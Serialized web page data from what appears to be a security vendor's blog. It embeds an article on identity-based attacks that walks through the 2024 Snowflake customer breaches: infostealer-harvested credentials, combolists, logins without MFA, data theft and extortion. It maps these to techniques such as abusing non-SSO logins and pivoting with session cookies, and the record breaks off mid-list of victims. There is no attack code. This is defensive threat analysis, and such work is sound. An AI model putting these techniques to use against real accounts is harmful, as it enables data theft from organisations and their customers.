eType":173},{},[],{"data":220903,"content":220904,"nodeType":235},{},[220905],{"data":220906,"marks":220907,"value":189264,"nodeType":173},{},[],{"data":220909,"content":220910,"nodeType":178},{},[220911,220914,220918,220921,220925],{"data":220912,"marks":220913,"value":189271,"nodeType":173},{},[],{"data":220915,"marks":220916,"value":65381,"nodeType":173},{},[220917],{"type":370},{"data":220919,"marks":220920,"value":189279,"nodeType":173},{},[],{"data":220922,"marks":220923,"value":189284,"nodeType":173},{},[220924],{"type":370},{"data":220926,"marks":220927,"value":189288,"nodeType":173},{},[],{"data":220929,"content":220930,"nodeType":178},{},[220931,220934,220938],{"data":220932,"marks":220933,"value":189295,"nodeType":173},{},[],{"data":220935,"marks":220936,"value":18547,"nodeType":173},{},[220937],{"type":370},{"data":220939,"marks":220940,"value":189303,"nodeType":173},{},[],{"data":220942,"content":220945,"nodeType":312},{"target":220943},{"sys":220944},{"id":189308,"type":317,"linkType":318},[],{"data":220947,"content":220948,"nodeType":178},{},[220949],{"data":220950,"marks":220951,"value":37,"nodeType":173},{},[],{"entries":220953},{"inline":220954,"hyperlink":220955,"block":220975},[],[220956,220958,220963,220968,220970],{"sys":220957,"__typename":1528,"title":184068,"slug":184071},{"id":183305},{"sys":220959,"__typename":6655,"title":220960,"slug":220961,"articleId":220962},{"id":189009},"What browsers does Push support?","what-browsers-does-push-support",10091,{"sys":220964,"__typename":66743,"title":220965,"slug":220966,"audience":66746,"linkedFromParent":220967},{"id":189034},"Managed deployment using an MDM on macOS","managed-deployment-using-an-mdm-on-macos",{"slug":148507},{"sys":220969,"__typename":1528,"title":202530,"slug":202533},{"id":114387},{"sys":220971,"__typename":6655,"title":220972,"slug":220973,"articleId":220974},{"id":189250},"Can I use my own labels to categorize apps in Push?","can-i-use-my-own-labels-to-categorize-apps-in-push",10116,[220976,220983,220989,220995,220998],{"sys":220977,"__typename":5345,"title":220978,"caption":118,"layoutMode":118,"file":220979},{"id":183997},"Events page - event details - docs - Connect to SIEM or SOAR",{"url":220980,"width":220981,"height":220982},"https://images.ctfassets.net/y1cdw1ablpvd/l6JvepRcU8ZCviZaSWM4T/2b0288c3080c3aa0040de13d73f4c782/events_page_filtered_20260305.png",3016,1726,{"sys":220984,"__typename":5345,"title":220985,"caption":220986,"layoutMode":118,"file":220987},{"id":189099},"Phishing toolkit block page - KB 10113","Customizable block page",{"url":220988,"width":23880,"height":19654},"https://images.ctfassets.net/y1cdw1ablpvd/7hGVqcQYa0xqDQa8uVBFim/665e8f7141bd272ea7b88ecf6a28de67/phishing_tool_blockpage.png",{"sys":220990,"__typename":5345,"title":220991,"caption":118,"layoutMode":118,"file":220992},{"id":189161},"Filter by admin audit events - Events page - docs - Administering Push",{"url":220993,"width":220994,"height":220982},"https://images.ctfassets.net/y1cdw1ablpvd/3CQxrWtRhUCq59PLEXY7aS/31f1a9bbbb439ba7c9476f4d05244685/events_page_audit_filtered_20260305.png",3020,{"sys":220996,"__typename":5345,"title":173195,"caption":118,"layoutMode":118,"file":220997},{"id":156868},{"url":173197,"width":107757,"height":173198},{"sys":220999,"__typename":5345,"title":221000,"caption":118,"layoutMode":118,"file":221001},{"id":189308},"Redesigned browsers page - July 2024 release notes",{"url":221002,"width":23880,"height":221003},"https://images.ctfassets.net/y1cdw1ablpvd/709L09QPWPIZBqLy3Z0uEH/43341660e566fa40f9611bc7095964eb/browsers_table.png",780,"content:blog:product-release-july-2024.json","blog/product-release-july-2024.json","blog/product-release-july-2024",{"_path":221008,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":221009,"ogImage":118,"summary":221012,"title":221030,"subtitle":118,"metaTitle":221030,"synopsis":221031,"hashTags":118,"publishedDate":221032,"slug":221033,"tagsCollection":221034,"relatedBlogPostsCollection":221040,"authorsCollection":225403,"content":225407,"_id":226786,"_type":5439,"_source":5440,"_file":226787,"_stem":226788,"_extension":5439},"/blog/5-reasons-why-push-security-shouldnt-exist",{"id":221010,"publishedAt":221011},"1fp5aOCIcGHDbdQ0amCYOf","2026-01-30T12:09:50.005Z",{"json":221013},{"data":221014,"content":221015,"nodeType":165},{},[221016,221023],{"data":221017,"content":221018,"nodeType":178},{},[221019],{"data":221020,"marks":221021,"value":221022,"nodeType":173},{},[],"If current security controls worked perfectly, Push wouldn't need to exist – unfortunately, they don't, so here we are!",{"data":221024,"content":221025,"nodeType":178},{},[221026],{"data":221027,"marks":221028,"value":221029,"nodeType":173},{},[],"In this article, we break down common misconceptions about identity controls like MFA, SSO, passkeys, and password managers, exploring some of the gaps they leave and how to fill them to achieve defense in depth.","5 reasons why Push Security shouldn’t exist","Breaking down common misconceptions about identity threats and controls like MFA, SSO, passkeys, password managers, and more.","2024-07-11T00:00:00.000Z","5-reasons-why-push-security-shouldnt-exist",{"items":221035},[221036,221038],{"sys":221037,"name":509},{"id":508},{"sys":221039,"name":26137},{"id":26136},{"items":221041},[221042,223984,224673],{"__typename":1528,"sys":221043,"content":221044,"title":223970,"synopsis":223971,"hashTags":118,"publishedDate":223972,"slug":223973,"tagsCollection":223974,"authorsCollection":223980},{"id":202170},{"json":221045},{"nodeType":165,"data":221046,"content":221047},{},[221048,221055,221087,221094,221100,221107,221127,221150,221157,221164,221188,221204,221211,221223,221230,221233,221240,221247,221263,221275,221282,221313,221316,221323,221341,221348,221356,221448,221455,221591,221598,221715,221722,221729,221899,221906,221913,221996,221999,222006,222013,222020,222083,222090,222123,222130,222173,222180,222186,222416,222422,222430,222437,222440,222447,222454,222461,222514,222521,222564,222571,222604,222610,222616,222781,222787,222795,222802,222810,222817,222825,222832,222835,222842,222849,222856,222919,222926,222959,222966,222999,223005,223011,223116,223119,223126,223133,223140,223203,223210,223243,223250,223283,223289,223295,223467,223470,223477,223484,223491,223564,223571,223604,223611,223644,223650,223656,223884,223887,223894,223901,223908,223915,223918,223925,223932,223939,223942,223949,223956,223963],{"nodeType":169,"data":221049,"content":221050},{},[221051],{"nodeType":173,"value":221052,"marks":221053,"data":221054},"Identity attacks on the rise?",[],{},{"nodeType":178,"data":221056,"content":221057},{},[221058,221062,221071,221075,221084],{"nodeType":173,"value":221059,"marks":221060,"data":221061},"Identity has been recorded as the #1 cyber attack vector since forever. You don’t have to look particularly hard to find statistics to support this. In 2023, one source reports that ",[],{},{"nodeType":186,"data":221063,"content":221065},{"uri":221064},"https://www.csoonline.com/article/648894/identity-based-security-threats-are-growing-rapidly-report.html",[221066],{"nodeType":173,"value":221067,"marks":221068,"data":221070},"4/5 breaches involved identity and compromised credentials",[221069],{"type":194},{},{"nodeType":173,"value":221072,"marks":221073,"data":221074},", while another suggests that ",[],{},{"nodeType":186,"data":221076,"content":221078},{"uri":221077},"https://rakgarg.substack.com/p/identity-crisis-the-biggest-prize",[221079],{"nodeType":173,"value":221080,"marks":221081,"data":221083},"75% of breaches are caused by mismanaged identity, access, or privileges",[221082],{"type":194},{},{"nodeType":173,"value":1477,"marks":221085,"data":221086},[],{},{"nodeType":178,"data":221088,"content":221089},{},[221090],{"nodeType":173,"value":221091,"marks":221092,"data":221093},"Phishing, social engineering, credential stuffing, and business email compromise have morphed into a homogenous understanding of identity threats that are generally tackled through a combination of email security tooling, content access controls, and user awareness. ",[],{},{"nodeType":312,"data":221095,"content":221099},{"target":221096},{"sys":221097},{"id":221098,"type":317,"linkType":318},"5NRWvCl0xsoWcpgHbcQIkf",[],{"nodeType":178,"data":221101,"content":221102},{},[221103],{"nodeType":173,"value":221104,"marks":221105,"data":221106},"The fact that such attacks have been reported as the top security threat for so long probably means that people pay less attention to identity threats. Ransomware grabs the headlines, and rightly so in many cases, but phishing feels like a “known known” that we have a plan for (even if the plan often fails). ",[],{},{"nodeType":178,"data":221108,"content":221109},{},[221110,221114,221123],{"nodeType":173,"value":221111,"marks":221112,"data":221113},"In fact, there’s a problem with messaging generally. The ",[],{},{"nodeType":186,"data":221115,"content":221117},{"uri":221116},"https://www.verizon.com/business/resources/T78/reports/data-breach-investigation-report_2015.pdf",[221118],{"nodeType":173,"value":221119,"marks":221120,"data":221122},"2015 Verizon DBIR",[221121],{"type":194},{},{"nodeType":173,"value":221124,"marks":221125,"data":221126}," contains plenty of stats that still ring largely true today. For example:",[],{},{"nodeType":250,"data":221128,"content":221129},{},[221130,221140],{"nodeType":254,"data":221131,"content":221132},{},[221133],{"nodeType":178,"data":221134,"content":221135},{},[221136],{"nodeType":173,"value":221137,"marks":221138,"data":221139},"In the 2013 DBIR, phishing was associated with over 95% of incidents attributed to state sponsored actors, and for two years running, more than two-thirds of incidents have featured phishing",[],{},{"nodeType":254,"data":221141,"content":221142},{},[221143],{"nodeType":178,"data":221144,"content":221145},{},[221146],{"nodeType":173,"value":221147,"marks":221148,"data":221149},"In 60% of cases, attackers are able to compromise an organization within minutes",[],{},{"nodeType":178,"data":221151,"content":221152},{},[221153],{"nodeType":173,"value":221154,"marks":221155,"data":221156},"Remove the dates and a lot of the report still stands up. ",[],{},{"nodeType":235,"data":221158,"content":221159},{},[221160],{"nodeType":173,"value":221161,"marks":221162,"data":221163},"Bad then, worse now",[],{},{"nodeType":178,"data":221165,"content":221166},{},[221167,221171,221176,221180,221185],{"nodeType":173,"value":221168,"marks":221169,"data":221170},"But identity attacks ",[],{},{"nodeType":173,"value":221172,"marks":221173,"data":221175},"are",[221174],{"type":370},{},{"nodeType":173,"value":221177,"marks":221178,"data":221179}," worse than they used to be. Yes, credential stuffing, phishing, and SIM swapping may not be the most sophisticated attacks, but they remain as effective as ever. ",[],{},{"nodeType":173,"value":221181,"marks":221182,"data":221184},"As the saying goes, if it ain’t broke — don’t fix it.",[221183],{"type":1646},{},{"nodeType":173,"value":10557,"marks":221186,"data":221187},[],{},{"nodeType":178,"data":221189,"content":221190},{},[221191,221195,221200],{"nodeType":173,"value":221192,"marks":221193,"data":221194},"Recent attacks have moved toward a broader targeting of the ",[],{},{"nodeType":173,"value":221196,"marks":221197,"data":221199},"identity infrastructure",[221198],{"type":370},{},{"nodeType":173,"value":221201,"marks":221202,"data":221203},". While phishing and social engineering was once primarily a delivery mechanism for malicious payloads to be executed on endpoint, it is now used to harvest credentials and secrets for identity-based attacks against cloud apps and services. ",[],{},{"nodeType":178,"data":221205,"content":221206},{},[221207],{"nodeType":173,"value":221208,"marks":221209,"data":221210},"And because businesses have migrated to more cloud-based services and infrastructure, the compromise of an identity now has different consequences.",[],{},{"nodeType":178,"data":221212,"content":221213},{},[221214,221218],{"nodeType":173,"value":221215,"marks":221216,"data":221217},"The data and functionality that attackers seek has moved off endpoints and internal networks and onto cloud systems and SaaS applications, which organizations are using in large numbers (tens to hundreds). The modern way of working means that applications are more often than not directly exposed to the internet — and the only thing needed to access these apps are identities. ",[],{},{"nodeType":173,"value":221219,"marks":221220,"data":221222},"Naturally, it's much harder to stop credential stuffing attacks against 100 SaaS apps than the single centralized external VPN/webmail endpoint of yesteryear. ",[221221],{"type":370},{},{"nodeType":178,"data":221224,"content":221225},{},[221226],{"nodeType":173,"value":221227,"marks":221228,"data":221229},"It’s clear that stats alone don’t adequately capture the identity threat. So we have to look beyond the numbers to find out why. ",[],{},{"nodeType":231,"data":221231,"content":221232},{},[],{"nodeType":169,"data":221234,"content":221235},{},[221236],{"nodeType":173,"value":221237,"marks":221238,"data":221239},"Using this resource",[],{},{"nodeType":178,"data":221241,"content":221242},{},[221243],{"nodeType":173,"value":221244,"marks":221245,"data":221246},"To cut through some of the noise, we’ve compiled this list of reported attacks and explored what they mean for the identity threat landscape. ",[],{},{"nodeType":178,"data":221248,"content":221249},{},[221250,221254,221259],{"nodeType":173,"value":221251,"marks":221252,"data":221253},"This is not intended to be an exhaustive list of all attacks involving the compromise of digital identities (the list would be endless!). Nor is it something you should read all in one go (unless you ",[],{},{"nodeType":173,"value":221255,"marks":221256,"data":221258},"really",[221257],{"type":1646},{},{"nodeType":173,"value":221260,"marks":221261,"data":221262}," want to, we won’t stop you). We want it to be a resource that you can refer back to, that we will continue to update as new attacks are recorded. ",[],{},{"nodeType":178,"data":221264,"content":221265},{},[221266,221270],{"nodeType":173,"value":221267,"marks":221268,"data":221269},"In this context we define identity attacks as ",[],{},{"nodeType":173,"value":221271,"marks":221272,"data":221274},"attacks targeting cloud identities and their associated identity management systems, protocols, applications, and infrastructure. ",[221273],{"type":370},{},{"nodeType":178,"data":221276,"content":221277},{},[221278],{"nodeType":173,"value":221279,"marks":221280,"data":221281},"The attacks recorded below are high profile examples of identity attacks that demonstrate how threat actors are leveraging the cloud identity plane to evade established cyber defenses and traverse new attack paths to achieve their goals. We’ve focused on attacks targeting identity infrastructure itself that are notable for their bypassing of traditional environments and established controls (e.g. Networkless or SaaS-to-SaaS attack paths). ",[],{},{"nodeType":178,"data":221283,"content":221284},{},[221285,221289,221297,221301,221310],{"nodeType":173,"value":221286,"marks":221287,"data":221288},"As with all publicly disclosed breaches, the level of detail and transparency we see varies. Where possible, we’ve mapped the threat actor Tactics, Techniques and Procedures to our ",[],{},{"nodeType":186,"data":221290,"content":221291},{"uri":88239},[221292],{"nodeType":173,"value":221293,"marks":221294,"data":221296},"SaaS Attack Matrix.",[221295],{"type":194},{},{"nodeType":173,"value":221298,"marks":221299,"data":221300}," To learn more about SaaS attack techniques ",[],{},{"nodeType":186,"data":221302,"content":221304},{"uri":221303},"https://pushsecurity.com/blog/saas-attack-techniques/#id-problems-with-observing-saas-attacks",[221305],{"nodeType":173,"value":221306,"marks":221307,"data":221309},"read the blog",[221308],{"type":194},{},{"nodeType":173,"value":2340,"marks":221311,"data":221312},[],{},{"nodeType":231,"data":221314,"content":221315},{},[],{"nodeType":169,"data":221317,"content":221318},{},[221319],{"nodeType":173,"value":221320,"marks":221321,"data":221322},"Snowflake – June 2024",[],{},{"nodeType":178,"data":221324,"content":221325},{},[221326,221330,221338],{"nodeType":173,"value":221327,"marks":221328,"data":221329},"The threat group known as ShinyHunters (also tracked as UNC5537) has claimed responsibility for breaching multiple organizations using Snowflake, a cloud-based data warehousing and analytics platform. The breach stems from the historical compromise of credentials used to access customer-specific Snowflake tenants, via infostealer infections. These credentials were used as part of a targeted campaign against Snowflake customers, which was exacerbated by the widespread absence of MFA due to the lack of MFA enforcement by default. At the time of writing, approximately 165 customers have been impacted globally ",[],{},{"nodeType":186,"data":221331,"content":221332},{"uri":4057},[221333],{"nodeType":173,"value":221334,"marks":221335,"data":221337},"according to a report by Mandiant",[221336],{"type":194},{},{"nodeType":173,"value":197,"marks":221339,"data":221340},[],{},{"nodeType":235,"data":221342,"content":221343},{},[221344],{"nodeType":173,"value":221345,"marks":221346,"data":221347},"How did Snowflake get breached?",[],{},{"nodeType":178,"data":221349,"content":221350},{},[221351],{"nodeType":173,"value":221352,"marks":221353,"data":221355},"It’s worth noting that customers/users of Snowflake were breached via their Snowflake tenants, and no central breach of Snowflake's own systems occurred.",[221354],{"type":1646},{},{"nodeType":250,"data":221357,"content":221358},{},[221359,221369,221391,221401,221410,221419,221428,221438],{"nodeType":254,"data":221360,"content":221361},{},[221362],{"nodeType":178,"data":221363,"content":221364},{},[221365],{"nodeType":173,"value":221366,"marks":221367,"data":221368},"Snowflake users were infected with infostealer malware that harvested credentials from user devices over an extended period. The threat actor used Snowflake customer credentials that were previously exposed via several infostealer malware variants, including; VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA and METASTEALER.",[],{},{"nodeType":254,"data":221370,"content":221371},{},[221372],{"nodeType":178,"data":221373,"content":221374},{},[221375,221379,221387],{"nodeType":173,"value":221376,"marks":221377,"data":221378},"Credentials appeared on criminal marketplaces e.g. dark web forums and ",[],{},{"nodeType":186,"data":221380,"content":221381},{"uri":174799},[221382],{"nodeType":173,"value":221383,"marks":221384,"data":221386},"Telegram channels",[221385],{"type":194},{},{"nodeType":173,"value":221388,"marks":221389,"data":221390}," as combolists (username, password, and login portal combinations). ",[],{},{"nodeType":254,"data":221392,"content":221393},{},[221394],{"nodeType":178,"data":221395,"content":221396},{},[221397],{"nodeType":173,"value":221398,"marks":221399,"data":221400},"Criminal groups (either ShinyHunters or another organization) saw the potential in targeting Snowflake users, based on the availability of credentials, number of customer organizations, and the value of the data that can be accessed in Snowflake. ",[],{},{"nodeType":254,"data":221402,"content":221403},{},[221404],{"nodeType":178,"data":221405,"content":221406},{},[221407],{"nodeType":173,"value":4245,"marks":221408,"data":221409},[],{},{"nodeType":254,"data":221411,"content":221412},{},[221413],{"nodeType":178,"data":221414,"content":221415},{},[221416],{"nodeType":173,"value":4255,"marks":221417,"data":221418},[],{},{"nodeType":254,"data":221420,"content":221421},{},[221422],{"nodeType":178,"data":221423,"content":221424},{},[221425],{"nodeType":173,"value":4265,"marks":221426,"data":221427},[],{},{"nodeType":254,"data":221429,"content":221430},{},[221431],{"nodeType":178,"data":221432,"content":221433},{},[221434],{"nodeType":173,"value":221435,"marks":221436,"data":221437},"ShinyHunters acquired massive quantities of Snowflake data based on the information that each customer stored in Snowflake or connected apps. The most sensitive data declared so far pertains to end-customers of each victim, for example PII, bank account and card information, etc.  ",[],{},{"nodeType":254,"data":221439,"content":221440},{},[221441],{"nodeType":178,"data":221442,"content":221443},{},[221444],{"nodeType":173,"value":221445,"marks":221446,"data":221447},"ShinyHunters began attempts to extort Snowflake and end-customers using the data acquired. ",[],{},{"nodeType":235,"data":221449,"content":221450},{},[221451],{"nodeType":173,"value":221452,"marks":221453,"data":221454},"What was the impact of the Snowflake breach?",[],{},{"nodeType":250,"data":221456,"content":221457},{},[221458,221477,221506,221534,221553,221572],{"nodeType":254,"data":221459,"content":221460},{},[221461],{"nodeType":178,"data":221462,"content":221463},{},[221464,221468,221473],{"nodeType":173,"value":221465,"marks":221466,"data":221467},"Approximately ",[],{},{"nodeType":173,"value":221469,"marks":221470,"data":221472},"165 victims were identified by Mandiant",[221471],{"type":370},{},{"nodeType":173,"value":221474,"marks":221475,"data":221476},". Organizations are gradually coming forward to declare the breach and release customer communications accordingly, but not all victims have been named.",[],{},{"nodeType":254,"data":221478,"content":221479},{},[221480],{"nodeType":178,"data":221481,"content":221482},{},[221483,221487,221492,221496,221503],{"nodeType":173,"value":221484,"marks":221485,"data":221486},"Based on the figures being suggested so far, the impact upon end-customers is huge, with the data of ",[],{},{"nodeType":173,"value":221488,"marks":221489,"data":221491},"hundreds of millions of people exposed",[221490],{"type":370},{},{"nodeType":173,"value":221493,"marks":221494,"data":221495},", and has been touted by some news outlets as ‘",[],{},{"nodeType":186,"data":221497,"content":221498},{"uri":3999},[221499],{"nodeType":173,"value":4005,"marks":221500,"data":221502},[221501],{"type":194},{},{"nodeType":173,"value":4009,"marks":221504,"data":221505},[],{},{"nodeType":254,"data":221507,"content":221508},{},[221509],{"nodeType":178,"data":221510,"content":221511},{},[221512,221516,221521,221525,221530],{"nodeType":173,"value":221513,"marks":221514,"data":221515},"The impact on the affected businesses is largely unknown at this stage. It’s clear that the victims will suffer ",[],{},{"nodeType":173,"value":221517,"marks":221518,"data":221520},"reputational damage",[221519],{"type":370},{},{"nodeType":173,"value":221522,"marks":221523,"data":221524}," based on the extent of their individual breaches, and possibly face other ",[],{},{"nodeType":173,"value":221526,"marks":221527,"data":221529},"penalties and sanctions",[221528],{"type":370},{},{"nodeType":173,"value":221531,"marks":221532,"data":221533}," if they are found to be at fault by their respective regulators and/or national information security authorities. ",[],{},{"nodeType":254,"data":221535,"content":221536},{},[221537],{"nodeType":178,"data":221538,"content":221539},{},[221540,221544,221549],{"nodeType":173,"value":221541,"marks":221542,"data":221543},"The impact upon individuals will be significant, with high potential for further targeting in terms of ",[],{},{"nodeType":173,"value":221545,"marks":221546,"data":221548},"identity theft, blackmail, financial crime",[221547],{"type":370},{},{"nodeType":173,"value":221550,"marks":221551,"data":221552},", etc.  ",[],{},{"nodeType":254,"data":221554,"content":221555},{},[221556],{"nodeType":178,"data":221557,"content":221558},{},[221559,221563,221568],{"nodeType":173,"value":221560,"marks":221561,"data":221562},"It is unclear what data has been exposed in addition to personal data affecting end-customers. If other sensitive commercial or business data pertaining to ",[],{},{"nodeType":173,"value":221564,"marks":221565,"data":221567},"Intellectual Property",[221566],{"type":370},{},{"nodeType":173,"value":221569,"marks":221570,"data":221571}," has been exposed then this data may also be sold on via other nefarious channels, with a potential future impact.",[],{},{"nodeType":254,"data":221573,"content":221574},{},[221575],{"nodeType":178,"data":221576,"content":221577},{},[221578,221582,221587],{"nodeType":173,"value":221579,"marks":221580,"data":221581},"Given the lack of MFA for the compromised accounts, there has been a general criticism of the ‘opt-in’ nature of MFA for SaaS services, with many security professionals suggesting that ",[],{},{"nodeType":173,"value":221583,"marks":221584,"data":221586},"Snowflake should enforce MFA by default",[221585],{"type":370},{},{"nodeType":173,"value":221588,"marks":221589,"data":221590}," given the critical nature of the service. ",[],{},{"nodeType":235,"data":221592,"content":221593},{},[221594],{"nodeType":173,"value":221595,"marks":221596,"data":221597},"What stands out in the Snowflake breach?",[],{},{"nodeType":250,"data":221599,"content":221600},{},[221601,221620,221660,221687],{"nodeType":254,"data":221602,"content":221603},{},[221604],{"nodeType":178,"data":221605,"content":221606},{},[221607,221611,221616],{"nodeType":173,"value":221608,"marks":221609,"data":221610},"The breach ",[],{},{"nodeType":173,"value":221612,"marks":221613,"data":221615},"was achieved by using stolen credentials dating back as far as 2020",[221614],{"type":370},{},{"nodeType":173,"value":221617,"marks":221618,"data":221619},", that had not been rotated or changed. This indicates that many of the credentials used were not necessarily the result of any recent data sharing. This highlights the potential risk of breached credentials already in the public domain; particularly in the case of cloud services that may not be subject to the same levels of credential hygiene as other traditional network logins. ",[],{},{"nodeType":254,"data":221621,"content":221622},{},[221623],{"nodeType":178,"data":221624,"content":221625},{},[221626,221630,221637,221640,221645,221649,221657],{"nodeType":173,"value":221627,"marks":221628,"data":221629},"Much of the industry response has focused on ensuring that accounts are using SSO (and therefore are protected by MFA at the IdP level). However, due to the existence of ",[],{},{"nodeType":186,"data":221631,"content":221632},{"uri":832},[221633],{"nodeType":173,"value":835,"marks":221634,"data":221636},[221635],{"type":194},{},{"nodeType":173,"value":2936,"marks":221638,"data":221639},[],{},{"nodeType":173,"value":221641,"marks":221642,"data":221644},"local logins without MFA can exist simultaneously with the SSO login unless expressly disabled",[221643],{"type":370},{},{"nodeType":173,"value":221646,"marks":221647,"data":221648},". Organizations using Snowflake that are looking to lock down their accounts can ",[],{},{"nodeType":186,"data":221650,"content":221651},{"uri":184425},[221652],{"nodeType":173,"value":221653,"marks":221654,"data":221656},"watch our recent demo of how to effectively remediate this vulnerability in Snowflake",[221655],{"type":194},{},{"nodeType":173,"value":481,"marks":221658,"data":221659},[],{},{"nodeType":254,"data":221661,"content":221662},{},[221663],{"nodeType":178,"data":221664,"content":221665},{},[221666,221671,221675,221683],{"nodeType":173,"value":221667,"marks":221668,"data":221670},"80% of the credentials were gathered through infostealer malware",[221669],{"type":370},{},{"nodeType":173,"value":221672,"marks":221673,"data":221674},". Typically, this occurs when unmanaged devices are used to access company resources, or personal browser profiles are synchronized on both work and personal devices. Malware deployed to an insecure personal device can then access and steal credentials for company resources. This situation usually occurs when working with third-party contractors on a BYOD basis; ",[],{},{"nodeType":186,"data":221676,"content":221677},{"uri":4411},[221678],{"nodeType":173,"value":221679,"marks":221680,"data":221682},"a recent article indicates that Ukraine-based EPAM Systems",[221681],{"type":194},{},{"nodeType":173,"value":221684,"marks":221685,"data":221686},", an engineering and digital service provider and “Elite Tier Partner” of Snowflake, was one such organization breached in this way. Organizations consuming Snowflake-related services from EPAM were then subsequently affected, as the compromise of EPAM users granted access to a large number of Snowflake credentials for various company tenants.  ",[],{},{"nodeType":254,"data":221688,"content":221689},{},[221690],{"nodeType":178,"data":221691,"content":221692},{},[221693,221697,221702,221706,221711],{"nodeType":173,"value":221694,"marks":221695,"data":221696},"While attacker activity has focused on Snowflake to date, the success of this attack will signal the potential for further credential based attacks against similar apps. ",[],{},{"nodeType":173,"value":221698,"marks":221699,"data":221701},"There may already be a 'Snowflake 2.0' among the credentials already available online",[221700],{"type":370},{},{"nodeType":173,"value":221703,"marks":221704,"data":221705},". Further, credentials can be used against a wide range of apps to capitalize on potential ",[],{},{"nodeType":173,"value":221707,"marks":221708,"data":221710},"password reuse (which we see for 1 in 3 employees)",[221709],{"type":370},{},{"nodeType":173,"value":221712,"marks":221713,"data":221714},", so the exact creds for a particular app don’t have to be explicitly breached, so long as the domain for the login portal can be guessed or has been exposed elsewhere.   ",[],{},{"nodeType":235,"data":221716,"content":221717},{},[221718],{"nodeType":173,"value":221719,"marks":221720,"data":221721},"SaaS attack matrix mapping",[],{},{"nodeType":178,"data":221723,"content":221724},{},[221725],{"nodeType":173,"value":221726,"marks":221727,"data":221728},"For more information on each TTP please navigate to the GitHub entries linked in the table below. ",[],{},{"nodeType":1653,"data":221730,"content":221731},{},[221732,221775,221837],{"nodeType":1657,"data":221733,"content":221734},{},[221735,221745,221755,221765],{"nodeType":1661,"data":221736,"content":221737},{},[221738],{"nodeType":178,"data":221739,"content":221740},{},[221741],{"nodeType":173,"value":221742,"marks":221743,"data":221744},"ID",[],{},{"nodeType":1661,"data":221746,"content":221747},{},[221748],{"nodeType":178,"data":221749,"content":221750},{},[221751],{"nodeType":173,"value":221752,"marks":221753,"data":221754},"Name",[],{},{"nodeType":1661,"data":221756,"content":221757},{},[221758],{"nodeType":178,"data":221759,"content":221760},{},[221761],{"nodeType":173,"value":221762,"marks":221763,"data":221764},"Stage",[],{},{"nodeType":1661,"data":221766,"content":221767},{},[221768],{"nodeType":178,"data":221769,"content":221770},{},[221771],{"nodeType":173,"value":221772,"marks":221773,"data":221774},"Description",[],{},{"nodeType":1657,"data":221776,"content":221777},{},[221778,221798,221817,221827],{"nodeType":1687,"data":221779,"content":221780},{},[221781],{"nodeType":178,"data":221782,"content":221783},{},[221784,221787,221795],{"nodeType":173,"value":37,"marks":221785,"data":221786},[],{},{"nodeType":186,"data":221788,"content":221789},{"uri":832},[221790],{"nodeType":173,"value":221791,"marks":221792,"data":221794},"SAT1017",[221793],{"type":194},{},{"nodeType":173,"value":37,"marks":221796,"data":221797},[],{},{"nodeType":1687,"data":221799,"content":221800},{},[221801],{"nodeType":178,"data":221802,"content":221803},{},[221804,221807,221814],{"nodeType":173,"value":37,"marks":221805,"data":221806},[],{},{"nodeType":186,"data":221808,"content":221809},{"uri":832},[221810],{"nodeType":173,"value":26529,"marks":221811,"data":221813},[221812],{"type":194},{},{"nodeType":173,"value":37,"marks":221815,"data":221816},[],{},{"nodeType":1687,"data":221818,"content":221819},{},[221820],{"nodeType":178,"data":221821,"content":221822},{},[221823],{"nodeType":173,"value":221824,"marks":221825,"data":221826},"Initial Access; Persistence; Defense Evasion",[],{},{"nodeType":1687,"data":221828,"content":221829},{},[221830],{"nodeType":178,"data":221831,"content":221832},{},[221833],{"nodeType":173,"value":221834,"marks":221835,"data":221836},"Abusing non-SSO additional login methods such as password-based authentication (local to the SaaS app), social logins, API access, etc. ",[],{},{"nodeType":1657,"data":221838,"content":221839},{},[221840,221860,221879,221889],{"nodeType":1687,"data":221841,"content":221842},{},[221843],{"nodeType":178,"data":221844,"content":221845},{},[221846,221849,221857],{"nodeType":173,"value":37,"marks":221847,"data":221848},[],{},{"nodeType":186,"data":221850,"content":221851},{"uri":114992},[221852],{"nodeType":173,"value":221853,"marks":221854,"data":221856},"SAT1044",[221855],{"type":194},{},{"nodeType":173,"value":37,"marks":221858,"data":221859},[],{},{"nodeType":1687,"data":221861,"content":221862},{},[221863],{"nodeType":178,"data":221864,"content":221865},{},[221866,221869,221876],{"nodeType":173,"value":37,"marks":221867,"data":221868},[],{},{"nodeType":186,"data":221870,"content":221871},{"uri":114992},[221872],{"nodeType":173,"value":197472,"marks":221873,"data":221875},[221874],{"type":194},{},{"nodeType":173,"value":37,"marks":221877,"data":221878},[],{},{"nodeType":1687,"data":221880,"content":221881},{},[221882],{"nodeType":178,"data":221883,"content":221884},{},[221885],{"nodeType":173,"value":221886,"marks":221887,"data":221888},"Lateral Movement; Defense Evasion",[],{},{"nodeType":1687,"data":221890,"content":221891},{},[221892],{"nodeType":178,"data":221893,"content":221894},{},[221895],{"nodeType":173,"value":221896,"marks":221897,"data":221898},"Session cookies are used to pivot from an endpoint compromise and laterally move to downstream SaaS applications.",[],{},{"nodeType":235,"data":221900,"content":221901},{},[221902],{"nodeType":173,"value":221903,"marks":221904,"data":221905},"Related breaches",[],{},{"nodeType":178,"data":221907,"content":221908},{},[221909],{"nodeType":173,"value":221910,"marks":221911,"data":221912},"Named victims are listed below:",[],{},{"nodeType":250,"data":221914,"content":221915},{},[221916,221926,221936,221946,221956,221966,221976,221986],{"nodeType":254,"data":221917,"content":221918},{},[221919],{"nodeType":178,"data":221920,"content":221921},{},[221922],{"nodeType":173,"value":221923,"marks":221924,"data":221925},"Ticketmaster",[],{},{"nodeType":254,"data":221927,"content":221928},{},[221929],{"nodeType":178,"data":221930,"content":221931},{},[221932],{"nodeType":173,"value":221933,"marks":221934,"data":221935},"Santander",[],{},{"nodeType":254,"data":221937,"content":221938},{},[221939],{"nodeType":178,"data":221940,"content":221941},{},[221942],{"nodeType":173,"value":221943,"marks":221944,"data":221945},"Neiman Marcus",[],{},{"nodeType":254,"data":221947,"content":221948},{},[221949],{"nodeType":178,"data":221950,"content":221951},{},[221952],{"nodeType":173,"value":221953,"marks":221954,"data":221955},"Los Angeles Unified",[],{},{"nodeType":254,"data":221957,"content":221958},{},[221959],{"nodeType":178,"data":221960,"content":221961},{},[221962],{"nodeType":173,"value":221963,"marks":221964,"data":221965},"Pure Storage",[],{},{"nodeType":254,"data":221967,"content":221968},{},[221969],{"nodeType":178,"data":221970,"content":221971},{},[221972],{"nodeType":173,"value":221973,"marks":221974,"data":221975},"Advance Auto 